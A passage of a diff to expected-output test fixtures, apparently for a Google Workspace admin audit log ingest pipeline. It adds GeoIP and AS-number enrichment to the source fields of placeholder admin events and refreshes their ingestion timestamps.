 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_SSL",
@@ -3044,6 +3608,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3053,7 +3629,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.915992Z",
+ "ingested": "2021-12-14T14:44:24.297935244Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
 "provider": "admin",
 "action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO",
@@ -3103,6 +3679,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3112,7 +3700,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916015800Z",
+ "ingested": "2021-12-14T14:44:24.297935575Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
 "provider": "admin",
 "action": "GENERATE_TRANSFER_TOKEN",
@@ -3167,6 +3755,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3176,7 +3776,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916021100Z",
+ "ingested": "2021-12-14T14:44:24.297935901Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_BACKGROUND_COLOR",
@@ -3231,6 +3831,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3240,7 +3852,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916024800Z",
+ "ingested": "2021-12-14T14:44:24.297936405Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_BORDER_COLOR",
@@ -3295,6 +3907,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3304,7 +3928,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916029400Z",
+ "ingested": "2021-12-14T14:44:24.297936733Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_ACTIVITY_TRACE",
@@ -3359,6 +3983,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3368,7 +4004,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916035400Z",
+ "ingested": "2021-12-14T14:44:24.297937064Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "provider": "admin",
 "action": "PLAY_FOR_WORK_ENROLL",
@@ -3423,6 +4059,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3432,7 +4080,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916041800Z",
+ "ingested": "2021-12-14T14:44:24.297937409Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}",
 "provider": "admin",
 "action": "PLAY_FOR_WORK_UNENROLL",
@@ -3487,6 +4135,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3496,7 +4156,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916047Z",
+ "ingested": "2021-12-14T14:44:24.297937814Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MX_RECORD_VERIFICATION_CLAIM",
@@ -3551,6 +4211,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3560,7 +4232,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916050900Z",
+ "ingested": "2021-12-14T14:44:24.297938151Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_NEW_APP_FEATURES",
@@ -3616,6 +4288,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3625,7 +4309,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916055700Z",
+ "ingested": "2021-12-14T14:44:24.297938500Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL",
@@ -3681,6 +4365,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3690,7 +4386,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916061200Z",
+ "ingested": "2021-12-14T14:44:24.297938834Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "UPLOAD_OAUTH_CERTIFICATE",
@@ -3745,6 +4441,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3754,7 +4462,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916066300Z",
+ "ingested": "2021-12-14T14:44:24.297939167Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
 "provider": "admin",
 "action": "REGENERATE_OAUTH_CONSUMER_SECRET",
@@ -3809,6 +4517,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3818,7 +4538,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916070300Z",
+ "ingested": "2021-12-14T14:44:24.297939798Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_OPEN_ID_ENABLED",
@@ -3874,6 +4594,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3883,7 +4615,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:31.916075100Z",
+ "ingested": "2021-12-14T14:44:24.297940126Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_ORGANIZATION_NAME",
@@ -3938,6 +4670,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -3947,7 +4691,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916078800Z", + "ingested": "2021-12-14T14:44:24.297940455Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TOGGLE_OUTBOUND_RELAY", @@ -4003,6 +4747,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4012,7 +4768,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916083500Z", + "ingested": "2021-12-14T14:44:24.297940785Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MAX_LENGTH", 
@@ -4067,6 +4823,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4076,7 +4844,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916087900Z", + "ingested": "2021-12-14T14:44:24.297941112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MIN_LENGTH", @@ -4131,6 +4899,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4140,7 +4920,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916092400Z", + "ingested": "2021-12-14T14:44:24.297941764Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", @@ -4195,6 +4975,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4204,7 +4996,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916096300Z", + "ingested": "2021-12-14T14:44:24.297942095Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", 
@@ -4260,6 +5052,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4269,7 +5073,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916101200Z", + "ingested": "2021-12-14T14:44:24.297942426Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION", @@ -4324,6 +5128,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4333,7 +5149,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916105800Z", + "ingested": "2021-12-14T14:44:24.297943386Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION_FROM_WHITELIST", 
@@ -4388,6 +5204,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4397,7 +5225,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916110700Z", + "ingested": "2021-12-14T14:44:24.297943869Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RENEW_DOMAIN_REGISTRATION", @@ -4450,6 +5278,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4459,7 +5299,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916116600Z", + "ingested": "2021-12-14T14:44:24.297944227Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RESELLER_ACCESS", @@ -4514,6 +5354,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4523,7 +5375,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916121900Z", + "ingested": "2021-12-14T14:44:24.297944555Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_ACTIONS_CHANGED", @@ -4578,6 +5430,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": 